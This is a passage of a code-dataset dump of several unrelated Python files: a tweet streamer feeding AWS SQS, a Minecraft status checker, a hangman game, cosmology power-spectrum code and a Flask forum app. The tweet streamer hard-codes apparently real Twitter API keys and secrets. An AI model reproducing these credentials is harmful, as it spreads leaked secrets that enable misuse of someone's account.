self._logger\n","sub_path":"pymod/Logger.py","file_name":"Logger.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"311033344","text":"\nfrom tweepy.streaming import StreamListener\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nimport boto3\nimport json\nfrom pyes import *\n#Enter your twitterAPI keys here\nconsumer_key = 'HeDMdrMZl1IRMundFMcY3c7hw'\nconsumer_secret = 'Smz8HNLqFiI8GMs6MGIJ21JJKe2Fs3D6R0R8S3KgievvgDSZG8'\naccess_token = '182386406-8Mhs3kxCnqDlAnE1n1YfavwyS8lgUFE836M6Zz0x'\naccess_secret = 'Z3eVU6UyrOPDifEWhYYy8zZH9levDmUbr5XLDrOHZ4pcf'\n\n# Get the service resource\nsqs = boto3.resource('sqs')\n# Create/Get the SQS Queue instance\nqueue = sqs.get_queue_by_name(QueueName='twitttrends-17')\nprint(queue.url)\n\nclass StdOutListener(StreamListener):\n def on_data(self, data):\n data_json = json.loads(data)\n try:\n if data_json[\"coordinates\"]:\n if data_json[\"lang\"] == \"en\":\n print(data_json['lang'])\n coordinates = data_json['coordinates']['coordinates']\n tweet = data_json['text']\n place = data_json['place']\n user_name = data_json['user']['name']\n e_data = {\n 'User_name': {'DataType': 'String', 'StringValue': user_name},\n 'City': {'DataType': 'String', 'StringValue': place['full_name']},\n 'Country': {'DataType': 'String', 'StringValue': place['country']},\n 'Latitude': {'DataType': 'String', 'StringValue': str(coordinates[0])},\n 'Longitude': {'DataType': 'String', 'StringValue': str(coordinates[1])}\n }\n #\n print(e_data)\n\n response = queue.send_message(MessageBody=tweet, MessageAttributes=e_data)\n print(\"Message ID \" + str(response.get('MessageId')))\n except Exception as e:\n print('Exception ' + str(e))\n return True\n\n def on_error(self, status):\n print('error ' + str(status))\n\n\nif __name__ == '__main__':\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_secret)\n stream = Stream(auth, StdOutListener())\n stream.filter(locations=[-180, -90, 180, 90])\n\n","sub_path":"TwittTrends/TweetTrends/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"430538643","text":"from mcstatus import MinecraftServer\n\nfile = open('servers.txt', 'r')\ncount = 0\n\nips = []\nwhile True:\n count += 1\n line = file.readline()\n if not line:\n break\n ips.append(line.strip())\n\nfor ip in ips:\n try:\n server = MinecraftServer.lookup(ip)\n status = server.status()\n print(ip)\n print(\"Players online:\", status.players.online)\n print(\"Version:\", status.version.name)\n print('')\n except:\n pass","sub_path":"info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"131351409","text":"import random\r\nfrom time import sleep as s\r\nprint(\"Let's play Hangman!\")\r\ns(1)\r\nprint(\"You have 1 more incorrect guesses than there are letters in the word\")\r\ns(2)\r\nprint(\"You may guess the whole word, but you will lose if you guess wrong\")\r\ns(2)\r\nprint(\"Here we go\")\r\ns(2)\r\nrepeat=\"\"\r\nfruits=[(\"apple\",5),(\"apricot\",8),(\"avocado\",6),(\"banana\",4),(\"blackcurrant\",10),(\"blueberry\",7),(\"carambola\",8),(\"cherry\",6),(\"coconut\",6),(\"cranberry\",8),\r\n (\"feijoa\",7),(\"fig\",4),(\"gooseberry\",8),(\"grapefruit\",10),(\"grape\",6),(\"melon\",6),(\"kiwi\",4),(\"lemon\",6),(\"lime\",5),(\"mandarin\",7),(\"mango\",6),\r\n (\"nectarine\",8),(\"orange\",7),(\"papaya\",4),(\"peach\",6),(\"pear\",5),(\"pineapple\",7),(\"plum\",5),(\"pomegranate\",10),(\"pummelo\",7),(\"raspberry\",8),\r\n (\"strawberry\",9),(\"tangerine\",8),(\"watermelon\",10)] #always will be expanded, all themes\r\nsports=[(\"soccer\",6),(\"football\",7),(\"baseball\",6),(\"basketball\",7),(\"tennis\",6),(\"hockey\",7)]\r\ncountries=[(\"Afghanistan\",10),(\"Albania\",7),(\"Algeria\",8),(\"Andorra\",7),(\"Angola\",7),(\"Anguilla\",8),(\"Antarctica\",8),(\"Argentina\",9),(\"Armenia\",8),\r\n (\"Aruba\",6),(\"Australia\",9),(\"Austria\",8),(\"Azerbaijan\",10),(\"Bahamas\",6),(\"Bahrain\",7),(\"Bangladesh\",10),(\"Barbados\",8),(\"Belarus\",8),\r\n (\"Belgium\",8),(\"Belize\",6),(\"Benin\",5),(\"Bermuda\",8),(\"Bhutan\",7),(\"Bolivia\",7),(\"Botswana\",8),(\"Brazil\",7),(\"Brunei\",7),(\"Bulgaria\",8),\r\n (\"Burundi\",7),(\"Cambodia\",8),(\"Cameroon\",8),(\"Canada\",5),(\"Chad\",5),(\"Chile\",6),(\"China\",6),(\"Columbia\",9),(\"Comoros\",6),(\"Congo\",5),\r\n (\"Croatia\",7),(\"Cuba\",5),(\"Cyprus\",7),(\"Denmark\",8),(\"Djibouti\",8),(\"Dominica\",8),(\"Ecuador\",8),(\"Egypt\",6),(\"Eritrea\",7),(\"Estonia\",8),\r\n (\"Ethiopia\",8),(\"Fiji\",4),(\"Finland\",7),(\"France\",7),(\"Gabon\",6),(\"Gambia\",6),(\"Georgia\",8),(\"Germany\",8),(\"Ghana\",5),(\"Gibraltar\",8),\r\n (\"Greece\",5),(\"Greenland\",8),(\"Grenada\",7),(\"Guadeloupe\",9),(\"Guatemala\",8),(\"Guinea\",7),(\"Guyana\",6),(\"Haiti\",5),(\"Vatican\",7),(\"Honduras\",9),\r\n (\"Hungary\",8),(\"Iceland\",8),(\"India\",6),(\"Indonesia\",9),(\"Iran\",5),(\"Iraq\",5),(\"Ireland\",8),(\"Israel\",7),(\"Italy\",6),(\"Jamaica\",6),(\"Japan\",5),\r\n (\"Jordan\",7),(\"Kazakstan\",8),(\"Kenya\",6),(\"Kiribati\",7),(\"North Korea\",10),(\"South Korea\",11),(\"Kosovo\",5),(\"Kuwait\",7),(\"Kyrgyzstan\",10),\r\n (\"Latvia\",6),(\"Lebanon\",7),(\"Lesotho\",7),(\"Liberia\",7),(\"Liechtenstein\",9),(\"Lithuania\",8),(\"Luxembourg\",10),(\"Macau\",5),(\"Macedonia\",9),\r\n (\"Madagascar\",8),(\"Malaysia\",7),(\"Maldives\",9),(\"Mali\",5),(\"Malta\",5),(\"Martinique\",10),(\"Mauritania\",8),(\"Mexico\",7),(\"Micronesia\",10),\r\n (\"Moldova\",7),(\"Monaco\",6),(\"Mongolia\",8),(\"Montenegro\",8),(\"Morocco\",5),(\"Mozambique\",11),(\"Myanmar\",7),(\"Namibia\",6),(\"Nauru\",5),(\"Nepal\",6),\r\n (\"Netherlands\",11),(\"Nicaragua\",8),(\"Niger\",6),(\"Norway\",7),(\"Oman\",5),(\"Pakistan\",8),(\"Panama\",5),(\"Paraguay\",7),(\"Peru\",5),(\"Philippines\",9),\r\n (\"Poland\",7),(\"Portugal\",9),(\"Qatar\",5),(\"Reunion\",7),(\"Romania\",7),(\"Russia\",6),(\"Rwanda\",6),(\"Samoa\",5),(\"Senegal\",7),(\"Serbia\",7),\r\n (\"Seychelles\",8),(\"Singapore\",10),(\"Slovakia\",8),(\"Slovenia\",9),(\"Somalia\",7),(\"SAR\",4),(\"Spain\",6),(\"Sudan\",6),(\"Suriname\",9),(\"Swaziland\",9),\r\n (\"Sweden\",6),(\"Switzerland\",12),(\"Syria\",6),(\"Taiwan\",6),(\"Tajikistan\",9),(\"Tanzania\",6),(\"Thailand\",8),(\"Togo\",4),(\"Tokelau\",8),(\"Tonga\",6),\r\n (\"Tunisia\",7),(\"Turkey\",7),(\"Turkmenistan\",12),(\"Tuvalu\",6),(\"Uganda\",6),(\"Ukraine\",8),(\"UAE\",4),(\"UK\",3),(\"USA\",4),(\"Uruguay\",7),\r\n (\"Uzbekistan\",11),(\"Vanuatu\",6),(\"Venezuela\",8),(\"Yemen\",5),(\"Zambia\",6),(\"Zimbabwe\",8),]\r\nthemes=[fruits,sports,countries]\r\n#final message setup\r\ntick=0\r\ncross=0\r\n#game\r\nwhile repeat==\"\":\r\n s(1)\r\n try:\r\n r=int(input(\"We have 3 themes to choose from: Type 0 to for fruits: Type 1 for sports: Type 2 for Countries:\"))\r\n choice=themes[r]\r\n except IndexError:\r\n print(\"Whoops, Choose a number from 0 to 2.\")\r\n repeat=''\r\n continue\r\n i=random.choice(choice)\r\n (word,turns)=i\r\n word=word.lower()\r\n s(1.5)\r\n print(\"The word is ready! You have\",turns,\"guesses... Good Luck\")\r\n wrong=0\r\n guess=[\"-\"]*len(word)\r\n letters=\"abcdefghijklmnopqrstuvwxyz\"\r\n while wrong<=turns:\r\n curr=''\r\n print(wrong,\"Guesses wrong so far\",end='')\r\n let=input(\":\")\r\n let=let.lower()\r\n s(1)\r\n if len(let)>1:\r\n print(\"You decided to guess the whole word\")\r\n s(1)\r\n if let==word:\r\n print(\"Congratulations!\")\r\n break\r\n else:\r\n print(\"You guessed wrong...\")\r\n break\r\n if let.isalpha()==False:\r\n print(\"Obviously, something is here.\")\r\n elif len(let)==0:\r\n print(\"Please guess a letter\")\r\n else:\r\n if (let in word) and (let in letters):\r\n print(\"Correct\")\r\n letters=letters.replace(let,\"\")\r\n for count in range(len(word)):\r\n if word[count]==let:\r\n guess[count]=let\r\n s(1)\r\n print(\"The word is now\", sep='')\r\n else:\r\n print(\"Wrong\")\r\n wrong+=1\r\n print(\"Here's what you have so far:\",end='')\r\n for l in guess:\r\n curr+=l\r\n print(curr)\r\n if curr==word:\r\n print(\"You've guessed it!\")\r\n tick+=1\r\n cross-=1\r\n break\r\n else:\r\n s(1)\r\n cross+=1\r\n print(\"The word is:\",word)\r\n print(\"Game Over\")\r\n repeat=input(\"Hit ENTER to play again. Type anything to end game:\")\r\nprint(\"Thank you for playing!\")\r\ns(1)\r\nprint(\"You guessed...\", tick, \" wrong\")\r\nprint(\"You guessed...\", cross, \" right\")","sub_path":"Hangman_Game.py","file_name":"Hangman_Game.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"488455787","text":"from django.urls import path, include\n\nfrom . import views\n\nurlpatterns = [\n path('list/', views.ReportListView.as_view()),\n path('detail/', views.ReportView.as_view()),\n path('get/list/', views.ReportViewGetByTree.as_view()),\n path('create/', views.add_report, name=\"add_report\"),\n]","sub_path":"reports/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"391873335","text":"n = int(input(\"Input a natural number: \")) # Do not change this line\n\n# Fill in the missing code below\nprime = True\ncounter = 2\n\nwhile counter < n:\n if n % counter == 0:\n prime = False\n counter += 1\n\n# Do not changes the lines below\nif prime:\n print(\"Prime\")\nelse:\n print(\"!Prime\")\n","sub_path":"verk3/daemi3.5.py","file_name":"daemi3.5.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"636074727","text":"import numpy as np\nimport warnings\nimport yaml\n\n# same convention as elsewhere\nSHEAR_SHEAR = 0\nSHEAR_POS = 1\nPOS_POS = 2\n\ndef ccl_read_yaml(filename, **kwargs):\n import pyccl as ccl\n \"\"\"Read the parameters from a YAML file.\n\n Args:\n filename (:obj:`str`) Filename to read parameters from.\n \"\"\"\n with open(filename, 'r') as fp:\n params = yaml.load(fp, Loader=yaml.Loader)\n\n # Now we assemble an init for the object since the CCL YAML has\n # extra info we don't need and different formatting.\n inits = dict(\n Omega_c=params['Omega_c'],\n Omega_b=params['Omega_b'],\n h=params['h'],\n n_s=params['n_s'],\n sigma8=None if params['sigma8'] == 'nan' else params['sigma8'],\n A_s=None if params['A_s'] == 'nan' else params['A_s'],\n Omega_k=params['Omega_k'],\n Neff=params['Neff'],\n w0=params['w0'],\n wa=params['wa'],\n bcm_log10Mc=params['bcm_log10Mc'],\n bcm_etab=params['bcm_etab'],\n bcm_ks=params['bcm_ks'],\n mu_0=params['mu_0'],\n sigma_0=params['sigma_0'])\n if 'z_mg' in params:\n inits['z_mg'] = params['z_mg']\n inits['df_mg'] = params['df_mg']\n\n if 'm_nu' in params:\n inits['m_nu'] = params['m_nu']\n inits['m_nu_type'] = 'list'\n\n inits.update(kwargs)\n\n return ccl.Cosmology(**inits)\n\n\ndef theory_3x2pt(cosmology_file, tracers, nbin_source, nbin_lens, fourier=True):\n \"\"\"Compute the 3x2pt theory, for example for a fiducial cosmology\n\n Parameters\n ----------\n cosmology_file: str\n name of YAML file\n\n tracers: dict{str:obj}\n dict of objects (e.g. sacc tracers) containing z, nz.\n keys are source_0, source_1, ..., lens_0, lens_1, ...\n \n nbin_source: int\n number of source bins\n\n nbin_lens: int\n number of lens bins\n\n Returns\n -------\n theory_cl: dict{str:array}\n theory c_ell for each pair (i,j,k) where k is one of\n SHEAR_SHEAR = 0, SHEAR_POS = 1, POS_POS = 2\n\n \"\"\"\n import pyccl as ccl\n\n cosmo = ccl_read_yaml(cosmology_file, matter_power_spectrum='halofit', Neff=3.04)\n\n ell_max = 3000 if fourier else 100_000\n n_ell = 100 if fourier else 200\n ell = np.logspace(1, np.log10(ell_max), n_ell).astype(int)\n ell = np.unique(ell)\n\n\n # Convert from SACC tracers (which just store N(z))\n # to CCL tracers (which also have cosmology info in them).\n CTracers = {}\n\n # Lensing tracers - need to think a little more about\n # the fiducial intrinsic alignment here\n for i in range(nbin_source):\n x = tracers[f'source_{i}']\n tag = ('S', i)\n CTracers[tag] = ccl.WeakLensingTracer(cosmo, dndz=(x.z, x.nz))\n # Position tracers - even more important to think about fiducial biases\n # here - these will be very very wrong otherwise!\n # Important enough that I'll put in a warning.\n warnings.warn(\"Not using galaxy bias in fiducial theory density spectra\")\n\n for i in range(nbin_lens):\n x = tracers[f'lens_{i}']\n tag = ('P', i) \n b = np.ones_like(x.z)\n CTracers[tag] = ccl.NumberCountsTracer(cosmo, dndz=(x.z, x.nz),\n has_rsd=False, bias=(x.z,b))\n\n # Use CCL to actually calculate the C_ell values for the different cases\n theory_cl = {}\n theory_cl['ell'] = ell\n k = SHEAR_SHEAR\n for i in range(nbin_source):\n for j in range(i+1):\n Ti = CTracers[('S',i)]\n Tj = CTracers[('S',j)]\n # The full theory C_ell over the range 0..ellmax\n theory_cl [(i,j,k)] = ccl.angular_cl(cosmo, Ti, Tj, ell)\n theory_cl [(j,i,k)] = theory_cl [(i,j,k)]\n \n\n # The same for the galaxy galaxy-lensing cross-correlation\n k = SHEAR_POS\n for i in range(nbin_source):\n for j in range(nbin_lens):\n Ti = CTracers[('S',i)]\n Tj = CTracers[('P',j)]\n theory_cl [(i,j,k)] = ccl.angular_cl(cosmo, Ti, Tj, ell)\n\n # And finally for the density correlations\n k = POS_POS\n for i in range(nbin_lens):\n for j in range(i+1):\n Ti = CTracers[('P',i)]\n Tj = CTracers[('P',j)]\n theory_cl [(i,j,k)] = ccl.angular_cl(cosmo, Ti, Tj, ell)\n theory_cl [(j,i,k)] = theory_cl [(i,j,k)]\n\n if fourier:\n return theory_cl\n\n theta_min = 1.0 / 60\n theta_max = 3.0\n theta = np.logspace(np.log10(theta_min), np.log10(theta_max), 200)\n\n theory_xi = {'theta': theta*60} # arcmin\n for key, val in theory_cl.items():\n if key == 'ell':\n continue\n i,j,k = key\n corr_type = {SHEAR_SHEAR: 'L+', POS_POS: 'GG', SHEAR_POS: 'GL'}[k]\n xi = ccl.correlation(cosmo, ell, val, theta, corr_type=corr_type)\n if k == SHEAR_SHEAR:\n xim = ccl.correlation(cosmo, ell, val, theta, corr_type='L-')\n theory_xi[(i,j,k)] = [xi,xim]\n else:\n theory_xi[(i,j,k)] = xi\n\n return theory_cl, theory_xi\n","sub_path":"txpipe/utils/theory.py","file_name":"theory.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"290023931","text":"# This contains our frontend; since it is a bit messy to use the @app.route\n# decorator style when using application factories, all of our routes are\n# inside blueprints. This is the front-facing blueprint.\n#\n# You can find out more about blueprints at\n# http://flask.pocoo.org/docs/blueprints/\n\nfrom flask import Blueprint, render_template\nfrom flask_nav.elements import Navbar, View, Subgroup, Link, Text, Separator\n\nfrom .nav import nav\n\nfrontend = Blueprint('frontend', __name__)\n\n# We're adding a navbar as well through flask-navbar. In our example, the\n# navbar has an usual amount of Link-Elements, more commonly you will have a\n# lot more View instances.\nnav.register_element('frontend_top', Navbar(\n View('Flask-Bootstrap', '.index'),\n View('Home', '.index'),\n View('Debug-Info', 'debug.debug_root'),\n Subgroup(\n 'Docs',\n Link('Flask-Bootstrap', 'http://pythonhosted.org/Flask-Bootstrap'),\n Link('Flask-AppConfig', 'https://github.com/mbr/flask-appconfig'),\n Link('Flask-Debug', 'https://github.com/mbr/flask-debug'),\n Separator(),\n Text('Bootstrap'),\n Link('Getting started', 'http://getbootstrap.com/getting-started/'),\n Link('CSS', 'http://getbootstrap.com/css/'),\n Link('Components', 'http://getbootstrap.com/components/'),\n Link('Javascript', 'http://getbootstrap.com/javascript/'),\n Link('Customize', 'http://getbootstrap.com/customize/'),\n )\n))\n\n\n# Our index-page just shows a quick explanation. Check out the template\n# \"templates/index.html\" documentation for more details.\n@frontend.route('/')\ndef index():\n return render_template('index.html')\n","sub_path":"sample_app/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"25800057","text":"# Variablelen\nnaam = \"Jordan\" #dit heet een string\naanuit = true #dit is een boolean\npuntgetal =5.5 #dit is een float of double\nkarakter = '#'\nheelgetal = 123 #dit is een integer\n\n\n#puntgetal = puntgetal * 2\n\n#is commentaar\n\nprint(naam)\nprint(aanuit)\nprint(puntgetal) #print(True)\nprint(restwaarde)\n\n\nuitkomst = heelgetal / puntgetal\nprint(uitkomt)\n\nnaam = \"Tantoe\"\n\nstukjeTekst = \"Hallo\"\nstukjeTekst += \" Mijn naam is \" + naam\nprint(stukjeTekst)","sub_path":"variabelen.py","file_name":"variabelen.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"92718771","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"testMetaTree\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(10) )\nprocess.source = cms.Source(\"PoolSource\",\n # replace 'myfile.root' with the source file you want to use \n fileNames = cms.untracked.vstring(\n 'file:/afs/cern.ch/user/m/mverzett/work/framework/CMSSW_7_0_7_patch1/src/URAnalysis/PATTools/test/pat_test.root'\n )\n)\n\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('DQMServices.Components.EDMtoMEConverter_cfi')\nprocess.load('URAnalysis.Ntuplizer.MetaNtuplize_cfi')\n\nprocess.TFileService = cms.Service(\n \"TFileService\", \n fileName = cms.string(\"test_meta_tree2.root\") \n)\n\nprocess.meta = cms.Sequence(\n process.EDMtoMEConverter +\n process.metaTree\n)\n\nprocess.p = cms.Path(process.meta)\nprocess.schedule = cms.Schedule(process.p)\n","sub_path":"Ntuplizer/test/test_meta_tree.py","file_name":"test_meta_tree.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"42184637","text":"# -*- encoding: utf-8 -*-\nfrom django import template\nfrom bs4 import BeautifulSoup\n\nregister = template.Library()\n\n\n@register.simple_tag(takes_context=True)\ndef get_entry_image(context, entry):\n imgurl = None\n leadsoup = BeautifulSoup(entry.lead)\n contentsoup = BeautifulSoup(entry.content)\n img = leadsoup.img or contentsoup.img\n if img:\n imgsrc = img[\"src\"]\n if imgsrc.endswith(\"jpg\") or imgsrc.endswith(\"png\"):\n request = context['request']\n imgurl = 'https://%s%s' %(request.get_host(), imgsrc)\n return imgurl\n","sub_path":"v2/patrodent/blog/templatetags/blog_tags.py","file_name":"blog_tags.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"544534815","text":"from flask import *\nfrom pymongo import MongoClient\n\n\n# my files\nimport config\nimport html\nimport utils\nfrom utils import getUser, getThread, getForum, admin\nimport auth\n\n\napp = Flask(__name__)\napp.debug = True\napp.secret_key = \"key\"\nc = MongoClient()\n\nfn = \"Index\"\ndef getFn():\n return fn\ndef getUID():\n try:\n return session[\"uid\"]\n except:\n return -1\n\ndef page(body,u):\n return render_template(\"index.html\",header=html.getHeader(u),body=body)\n\n# LOGIN/REGISTER\n@app.route(\"/login\",methods=['GET','POST'])\ndef login():\n # type:\n # 1 = username/password combo does not exist\n if request.method == \"POST\":\n user = auth.login(request.form[\"username\"],request.form[\"password\"])\n \n if user:\n session[\"uid\"] = user[\"id\"]\n return redirect(\"/?type=3\")\n else:\n return page(html.login(1),-1)\n else:\n return page(html.login(0),-1)\n\n\n@app.route(\"/register\",methods=['GET','POST'])\ndef register():\n # type:\n # 1 = username already in use\n # 2 = passwords don't match\n if request.method == \"POST\":\n if request.form[\"password\"] == request.form[\"password2\"]:\n result = auth.register(request.form[\"username\"],request.form[\"password\"])\n if result:\n session[\"uid\"] = result\n return redirect(\"/?type=2\")\n else:\n return page(html.register(1),-1)\n else:\n return page(html.register(2),-1)\n else:\n return page(html.register(0),-1)\n\n@app.route(\"/logout\")\ndef logout():\n session.pop(\"uid\",None)\n return redirect(\"/?type=1\")\n\n@app.route(\"/\")\ndef index():\n # type:\n # 1 = logged out\n # 2 = registered\n # 3 = logged in\n uid = getUID()\n nav = utils.nav([[fn]])\n r = \"\"\n\n r += '
Forum
'\n r += nav\n\n tp = request.args.get(\"type\")\n mes = \"\"\n if tp == '1':\n mes = \"You have logged out.\"\n elif tp == '2':\n mes = \"Account registration successful!\"\n elif tp == '3':\n mes = \"You have logged in.\"\n\n if mes:\n r += '
Success: %s
'%(mes)\n\n r += \"\"\"\n\n\n\n\n\n\n\"\"\"\n for x in c.forums.Collections.find():\n r += html.forum(x)\n r += '
Forum NameThreadsPostsLast Post
'\n \n r += \"\"\"\n\n\n\n\n\n\n\n
Forum Statistics
\nTotal Posts: %d
\nTotal Threads: %d
\nTotal Users: %d\n
\"\"\"%(c.posts.Collections.find().count(),c.threads.Collections.find().count(),c.users.Collections.find().count())\n\n\n\n\n r += nav\n\n\n return page(r,uid)\n\n\n@app.route(\"/forum-\")\ndef forum(n):\n # type:\n # 1 = thread deleted\n uid = getUID()\n r = \"\"\n \n forum = getForum(n)\n if forum:\n\n nav = utils.nav([\n [\"/\",fn],\n [forum[\"name\"]]\n ])\n\n options = \"\"\n if uid != -1:\n options = ''%(forum['id'])\n\n r += '
%s
'%(forum['name'])\n r += nav\n\n tp = request.args.get(\"type\")\n mes = \"\"\n if tp == '1':\n mes = \"Thread deleted.\"\n\n if mes:\n r += '
Success: %s
'%(mes)\n\n\n r += options\n r += \"\"\"\n\n\"\"\"\n thr = c.threads.Collections.find({\"fid\":forum['id']})\n if thr.count() == 0:\n r += ''\n else:\n for x in thr:\n r += html.thread(x,admin(uid))\n r += '
Thread TitleAuthorPostsLast Post
No threads exist in this forum
'\n r += options\n r += nav\n\n return page(r,uid)\n\n\n@app.route(\"/thread-\")\ndef thread(n):\n uid = getUID()\n\n\n r = \"\"\n\n thread = getThread(n)\n \n if thread:\n # if thread is hidden and cannot view\n if thread['hid'] and not admin(uid):\n return page(html.permissionDenied(),uid)\n\n posts = c.posts.Collections.find({\"tid\":thread['id']}).sort(\"id\",1)\n # pages\n pg = 1\n p = request.args.get(\"page\")\n if p:\n pg = int(p)\n\n pghtml = html.pages(pg,int((posts.count()-1)/config.postsPerPage())+1,\"thread-%d?page=\"%(thread['id']))\n\n forum = getForum(thread[\"fid\"])\n nav = utils.nav([\n [\"/\",fn],\n [\"/forum-%d\"%(forum['id']),forum[\"name\"]],\n [thread[\"title\"]]\n ])\n\n\n atools = \"\"\n\n\n\n # admin tools\n if admin(uid):\n atools += \"\"\"\n\n\n\n\n\n
Administrative
Tools
\n Edit Thread Title\"\"\"%(thread['id'])\n\n # lock/unlock\n if \"lock\" in thread.keys() and thread['lock']:\n atools += ' Unlock Thread'%(thread['id'])\n else:\n atools += ' Lock Thread'%(thread['id'])\n\n # hide/unhide\n if \"hid\" in thread.keys() and thread['hid']:\n atools += ' Unhide Thread'%(thread['id'])\n else:\n atools += ' Hide Thread'%(thread['id'])\n atools += \"\"\"\n Delete Thread\n
\"\"\"%(thread['id'])\n\n options = \"\"\n if uid != -1 and (not thread['lock'] or admin(uid)):\n options = ''%(thread['id'])\n\n\n r += '
%(title)s
%(desc)s
'%(thread)\n\n r += '
'\n\n if thread['lock']:\n r += ' Locked'\n if thread['hid']:\n r += ' Hidden'\n \n r += '
'\n\n mes = request.args.get(\"type\")\n if mes == '1':\n mes = \"Thread title edited\"\n elif mes == '2':\n mes = \"Thread hidden\"\n elif mes == '3':\n mes = \"Thread unhidden\"\n elif mes == '4':\n mes = \"Thread locked\"\n elif mes == '5':\n mes = \"Thread unlocked\"\n elif mes == '51':\n mes = \"Post deleted\"\n elif mes == '52':\n mes = \"Post edited\"\n\n\n\n r += nav\n if mes:\n r += '
Success: %s
'%(mes)\n r += atools\n r += pghtml\n r += options\n r += '
'\n\n\n ppp = config.postsPerPage()\n for x in range((pg-1)*ppp,min(pg*ppp,posts.count())):\n r += html.post(uid,posts[x])\n\n r += '
'\n r += options\n r += pghtml\n r += nav\n\n return page(r,uid)\n else:\n return page(html.threadDoesNotExist(),uid)\n\n\n \n\n\n\n\n\n# CREATE NEW .....\n# add post, n = tid\n@app.route(\"/reply-\",methods=['GET','POST'])\ndef reply(n):\n uid = getUID()\n\n if uid == -1:\n return page(html.permissionDenied(),-1)\n if request.method == \"POST\":\n tid = int(request.form[\"tid\"])\n thread = c.threads.Collections.find_one({\"id\":tid})\n \n if thread:\n if (not thread['hid'] and not thread['lock']) or admin(uid):\n utils.createPost(uid, tid, request.form[\"content\"])\n return redirect(\"/thread-%d\"%(tid))\n else:\n return page(html.permissionDenied(),uid)\n else:\n return page(html.threadDoesNotExist(),uid)\n else:\n r = \"\"\n \n thread = c.threads.Collections.find_one({\"id\":int(n)})\n if thread:\n if (not thread['hid'] and not thread['lock']) or admin(uid):\n r += html.reply(thread[\"id\"])\n return page(r,uid)\n else:\n return page(html.permissionDenied(),uid)\n else:\n return page(html.threadDoesNotExist(),uid)\n\n# new thread, n = tid\n@app.route(\"/newthread-\",methods=['GET','POST'])\ndef newthread(n):\n uid = getUID()\n\n if uid == -1:\n return page(html.permissionDenied(),-1)\n\n if request.method == \"POST\":\n fid = int(request.form[\"fid\"])\n forum = c.forums.Collections.find_one({\"id\":fid})\n \n if forum:\n tid = utils.createThread(uid, fid, request.form[\"title\"], request.form[\"desc\"], request.form[\"content\"])\n return redirect(\"/thread-%d\"%(tid))\n else:\n return page(html.forumDoesNotExist(),uid)\n else:\n r = \"\"\n \n forum = c.forums.Collections.find_one({\"id\":int(n)})\n if forum:\n r += html.newthread(forum[\"id\"])\n return page(r,uid)\n else:\n return page(html.forumDoesNotExist(),uid)\n\n@app.route(\"/editpost-\",methods=['GET','POST'])\ndef editpost(n):\n uid = getUID()\n\n if request.method == \"POST\":\n pid = int(request.form[\"pid\"])\n post = c.posts.Collections.find_one({\"id\":pid})\n \n if post:\n if (uid == post[\"uid\"] and not post['hid'] and not getThread(post['tid'])['hid']) or admin(uid):\n utils.editPost(uid, pid, request.form[\"content\"])\n return redirect(\"/thread-%d?type=52\"%(getThread(post[\"tid\"])['id']))\n else:\n return page(html.permissionDenied(),uid)\n else:\n return page(html.postDoesNotExist(),uid)\n else:\n r = \"\"\n \n post = c.posts.Collections.find_one({\"id\":int(n)})\n if post:\n if (uid == post[\"uid\"] and not post['hid'] and not getThread(post['tid'])['hid']) or admin(uid):\n r += html.editpost(post[\"id\"])\n return page(r,uid)\n else:\n return page(html.permissionDenied(),uid)\n else:\n return page(html.postDoesNotExist(),uid)\n\n@app.route(\"/edittitle-\",methods=['GET','POST'])\ndef edittitle(n):\n uid = getUID()\n\n if request.method == \"POST\":\n tid = int(request.form[\"tid\"])\n thread = c.threads.Collections.find_one({\"id\":tid})\n \n if thread:\n if admin(uid):\n utils.edittitle(tid, request.form[\"title\"], request.form[\"desc\"])\n return redirect(\"/thread-%d?type=1\"%(tid))\n else:\n return page(html.permissionDenied(),uid)\n else:\n return page(html.threadDoesNotExist(),uid)\n else:\n r = \"\"\n \n thread = c.threads.Collections.find_one({\"id\":int(n)})\n if thread:\n if admin(uid):\n r += html.edittitle(thread[\"id\"])\n return page(r,uid)\n else:\n return page(html.permissionDenied(),uid)\n else:\n return page(html.threadDoesNotExist(),uid)\n\n\n# admin tools\n@app.route(\"/delthread-\",methods=['GET','POST'])\ndef delthread(n):\n uid = getUID()\n\n if request.method == \"POST\":\n tid = int(request.form[\"tid\"])\n thread = c.threads.Collections.find_one({\"id\":tid})\n \n if thread:\n if admin(uid):\n utils.delthread(tid)\n if \"ajax\" in request.form:\n return \"/forum-%d?type=1\"%(thread['fid'])\n else:\n return redirect(\"/forum-%d?type=1\"%(thread['fid']))\n else:\n return page(html.permissionDenied(),uid)\n else:\n return page(html.threadDoesNotExist(),uid)\n else:\n r = \"\"\n \n thread = 